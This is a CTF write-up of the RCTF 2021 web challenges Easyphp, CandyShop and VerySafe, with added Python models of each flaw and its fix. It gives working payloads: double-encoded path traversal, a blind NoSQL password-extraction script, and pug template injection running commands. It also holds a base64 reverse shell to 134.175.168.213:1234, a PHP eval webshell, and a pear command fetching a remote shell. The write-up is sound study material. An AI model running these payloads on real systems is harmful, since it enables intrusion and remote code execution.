RCTF 2021

Too hard, I couldn't reproduce them 🙃

Easyphp

Just a common and simple php service
http://124.71.132.232:60080

Challenge attachment: Download attachment 1

This challenge is built on the Flight framework; official repository: https://github.com/mikecao/flight

Flight is a fast, simple, extensible framework for PHP. Flight enables you to quickly and easily build RESTful web applications.

First, look at index.php.

Following the code, we find a file_get_contents call that allows arbitrary file reads.

Accessing /admin directly returns Forbidden.

The reason is that nginx restricts /admin to local access only.

Here we can see that Router.php runs one urldecode on the incoming URL.

So we can bypass the restriction with /ad%256din, because the routes are matched in order.

Here we also need to bypass stristr($request->url, "login").

That can be bypassed with /ad%256din%253flogin.

There is also an isdanger function that filters out ../.

We can see that data comes in from the /admin route as "./".$request->query->data, so the filter is bypassed with plain double URL encoding.

Payload:

```text
/ad%256din%253flogin%3fdata=..%252f..%252f..%252fflag
```
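The bypass above works because the filter inspects the value after one decode while the file read decodes it once more. The following Python is an added example, not the challenge's code or Flight's: it models that two-layer pipeline with an assumed isdanger() filter and assumed decode stages (the challenge's exact nginx and Flight handling is not reproduced), and shows a hardened variant that canonicalises the value before checking it.

```python
from urllib.parse import unquote

# Added illustration of the double-URL-encoding bypass, not the challenge's code.
# Assumed pipeline: a filter that looks at the parameter after ONE percent-decode,
# and a file read that percent-decodes it ONCE MORE before building the path.
# isdanger() mirrors the writeup's description (it only rejects a literal '../').


def isdanger(value: str) -> bool:
    """Naive filter: reject only a literal '../' in the value."""
    return "../" in value


def read_path_naive(raw_param: str) -> str:
    """Vulnerable flow: filter after the first decode, decode again before use.

    Returns the path that would reach file_get_contents(), or 'blocked'.
    """
    once = unquote(raw_param)        # first layer, e.g. query-string parsing
    if isdanger(once):
        return "blocked"
    twice = unquote(once)            # a later layer decodes a second time
    return "./" + twice


def canonical(value: str) -> str:
    """Percent-decode until the value stops changing, so every layer is peeled off."""
    while True:
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded


def read_path_hardened(raw_param: str) -> str:
    """Hardened flow: check the fully decoded value, and decode nothing after the check."""
    value = canonical(raw_param)
    if isdanger(value) or value.startswith("/"):
        return "blocked"
    return "./" + value


PLAIN = "../../../flag"                  # caught by the filter
PAYLOAD = "..%252f..%252f..%252fflag"    # '/' double-encoded, as in the writeup

if __name__ == "__main__":
    print(read_path_naive(PLAIN))        # blocked
    print(read_path_naive(PAYLOAD))      # ./../../../flag  (escapes the web root)
    print(read_path_hardened(PAYLOAD))   # blocked
```

Canonicalising before the check closes the encoding gap, but a substring filter stays brittle; the robust fix is to resolve the final path with realpath() and verify it is still inside the intended directory.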

Nu1L team's solution

```text
/login/..;/admin%3flogin=aa&data=..%252f..%252f..%252fflag
```

CandyShop

Buy some sweet candies online?
The container will be restarted every 10 minutes
http://123.60.21.23:23333

Challenge attachment: Download attachment 1

Looking at the source, we find that newly registered accounts are not activated.

But there is a rabbit account that is activated, although we don't have its password.

First, there is a NoSQL injection here:

```python
# -*- coding: utf-8 -*-
"""
Create Time: 2021/9/11 12:58
Author: JrXnm
"""
import requests
import string

url = "http://123.60.21.23:23333/user/login"

# Blind NoSQL injection: the bracket key password[$regex] is parsed into
# {"password": {"$regex": "..."}}, so the login response leaks whether the
# prefix matches. The password is hex, so hexdigits is the whole alphabet.
flag = ''
while True:
    for i in string.hexdigits:
        data = {
            "username": "rabbit",
            "password[$regex]": "^" + flag + i
        }
        res = requests.post(url, data=data)

        # "You Bad Bad" is the response that indicates the regex matched
        if "You Bad Bad" in res.text:
            flag += i
            print(flag)
            break
    else:
        # no character extended the prefix: the whole password has been recovered
        break
```
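As an added example (not the challenge's code or the script above), the following Python simulates the vulnerable server side, an Express-style body parser that turns the bracket key password[$regex] into a nested object which the Mongo query then treats as an operator, and generalises the extraction: the prefix is regex-escaped so the technique works for any alphabet, and an anchored probe detects when the whole secret has been recovered. The user record, the response text and the hardened login are constructed for this illustration.

```python
import re
import string
from urllib.parse import parse_qsl, urlencode

# Added illustration, not the challenge's code. It simulates the server side
# (Express-style bracket keys parsed into a nested object that MongoDB would read
# as a query with an operator) and generalises the writeup's script into an
# extractor that escapes regex metacharacters and detects the end of the secret.

# Constructed user collection standing in for the real MongoDB data.
USERS = [{"username": "rabbit", "password": "7c5e3a", "activated": True}]
HEX_ALPHABET = string.hexdigits
MATCH_MARKER = "You Bad Bad"      # the response the writeup uses as its oracle


def parse_body(body: str) -> dict:
    """'password[$regex]=^7' -> {'password': {'$regex': '^7'}}, like qs does (one level deep)."""
    query = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"(\w+)\[([^\]]+)\]", key)
        if m:
            query.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            query[key] = value
    return query


def mongo_match(doc: dict, query: dict) -> bool:
    """Minimal matcher: strings compare for equality, {'$regex': p} runs a regex search."""
    for field, cond in query.items():
        actual = doc.get(field)
        if isinstance(cond, dict):
            pattern = cond.get("$regex")
            if pattern is None or not re.search(pattern, str(actual)):
                return False      # only $regex is modelled here
        elif actual != cond:
            return False
    return True


def login(body: str) -> str:
    """Simulated /user/login: findOne(query) on the collection; the response text is the oracle."""
    query = parse_body(body)
    if any(mongo_match(doc, query) for doc in USERS):
        return MATCH_MARKER
    return "Login failed"


def login_hardened(body: str) -> str:
    """Fix: operator objects never reach the query; every field must be a plain string."""
    query = parse_body(body)
    if not all(isinstance(v, str) for v in query.values()):
        return "Bad request"
    return login(body)


def extract_via_regex(oracle, username: str, alphabet: str) -> str:
    """Grow the secret one character at a time through a $regex oracle.

    The prefix is regex-escaped so metacharacters in the secret cannot break the probe,
    and an anchored '^...$' probe detects when the whole secret has been recovered.
    """
    found = ""
    while True:
        done = urlencode({"username": username, "password[$regex]": f"^{re.escape(found)}$"})
        if oracle(done) == MATCH_MARKER:
            return found
        for ch in alphabet:
            probe = urlencode({"username": username, "password[$regex]": f"^{re.escape(found + ch)}"})
            if oracle(probe) == MATCH_MARKER:
                found += ch
                break
        else:
            raise RuntimeError("no character extends the prefix; alphabet incomplete?")


if __name__ == "__main__":
    print(extract_via_regex(login, "rabbit", HEX_ALPHABET))   # 7c5e3a
```

Against the real service the oracle would be a function that POSTs the body to /user/login and returns the response text; the extractor itself does not change.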

Here we see that the shop page renders a pug template.

Look at the text replacement done before the template is rendered:

```js
let tpl = result
    .toString()
    .replace('USERNAME', username)
    .replace('CANDYNAME', candyname)
    .replace('ADDRESS', address)
```

Since the values are spliced into the template source before it is compiled, we only need a quote and an equals sign to close the attribute before and after our input (the + signs in the form body below are URL-encoded spaces).

Payload:

```text
username=1&candyname=1&address='+a=global.process.mainModule.constructor._load('child_process').execSync("cat+/flag").toString()+b='
```

Or a reverse shell (the base64 blob decodes to a Node snippet that spawns /bin/sh and pipes it over a socket to 134.175.168.213:1234):

```text
username=rabbit&candyname=bunny_candy&address='+a=function(){eval(atob("dmFyIG5ldD1wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgibmV0Iik7CnZhciBjcD1wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpOwp2YXIgc2g9Y3Auc3Bhd24oIi9iaW4vc2giLFtdKTsKdmFyIGNsaWVudD1uZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMjM0LCIxMzQuMTc1LjE2OC4yMTMiLCgpPT57Y2xpZW50LnBpcGUoc2guc3RkaW4pO3NoLnN0ZG91dC5waXBlKGNsaWVudCk7c2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs="));}()+b='
```

VerySafe

I think it’s very safe
http://123.60.21.23:54120

Challenge attachment: Download attachment 1

First, the challenge's docker-compose.yml specifies image: caddy:2.4.2. In Caddy <= 2.4.2 the script path handed to php-fpm can contain directory traversal. In addition, register_argc_argv is on by default, and peclcmd.php is shipped by default as well; because of the security.limit_extensions restriction, only files with a .php suffix can be executed.

Official solution

```http
GET /../usr/local/lib/php/peclcmd.php?+config-create+/tmp/<?=eval($_POST[1]);?>/*+/srv/qqqq.php

POST /../tmp/qqqq.php
1=system('/readflag');
```

星盟 team's solution

Have pear download the remote file, then just request the downloaded shell.

```http
/../usr/local/lib/php/pearcmd.php?pearcmd.php+install+--installroot+/tmp/+http://134.175.168.213/1.php

/../tmp/tmp/pear/download/1.php?1=system('/readflag');
```
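The following Python is an added illustration, not Caddy's or php-fpm's code. It models the script-path mapping that both solutions above abuse: a naive root + request path mapping lets /../ walk out of the document root to pearcmd.php and into /tmp, while a hardened mapping normalises the path first, checks that it is still under the root, and applies the .php allowlist that security.limit_extensions enforces on the php-fpm side. The /srv document root is an assumption made for the example.

```python
import posixpath

# Added illustration, not Caddy's or php-fpm's code. It models how a request path is
# turned into the script path handed to php-fpm under two policies: naive concatenation,
# which lets '/../' walk out of the document root the way the writeup's requests do,
# and a hardened mapping that normalises first, requires the result to stay under the
# root, and applies a .php allowlist (the role security.limit_extensions plays in php-fpm).

WEB_ROOT = "/srv"                 # assumed document root for this illustration
ALLOWED_EXTENSIONS = (".php",)    # what security.limit_extensions = .php would permit


def script_path_naive(root: str, request_path: str) -> str:
    """Vulnerable mapping: the raw request path is appended to the root as-is."""
    return root + request_path


def resolved_naive(root: str, request_path: str) -> str:
    """Where the naive mapping really lands once the filesystem resolves '..' segments."""
    return posixpath.normpath(script_path_naive(root, request_path))


def script_path_hardened(root: str, request_path: str):
    """Hardened mapping: normalise, then enforce root containment and the extension allowlist.

    Returns the script path, or None when the request must be refused.
    """
    root = root.rstrip("/")
    candidate = posixpath.normpath(root + "/" + request_path.lstrip("/"))
    if not candidate.startswith(root + "/"):
        return None               # '..' escaped the document root
    if not candidate.endswith(ALLOWED_EXTENSIONS):
        return None               # php-fpm would refuse a non-.php script anyway
    return candidate


if __name__ == "__main__":
    traversal = "/../usr/local/lib/php/pearcmd.php"          # from the writeup's requests
    print(resolved_naive(WEB_ROOT, traversal))               # /usr/local/lib/php/pearcmd.php
    print(script_path_hardened(WEB_ROOT, traversal))         # None
    print(script_path_hardened(WEB_ROOT, "/index.php"))      # /srv/index.php
```

The extension allowlist alone does not stop either solution, because pearcmd.php and the downloaded 1.php both end in .php; only the containment check does, which is why the fix belongs in the path mapping rather than in php-fpm's limit.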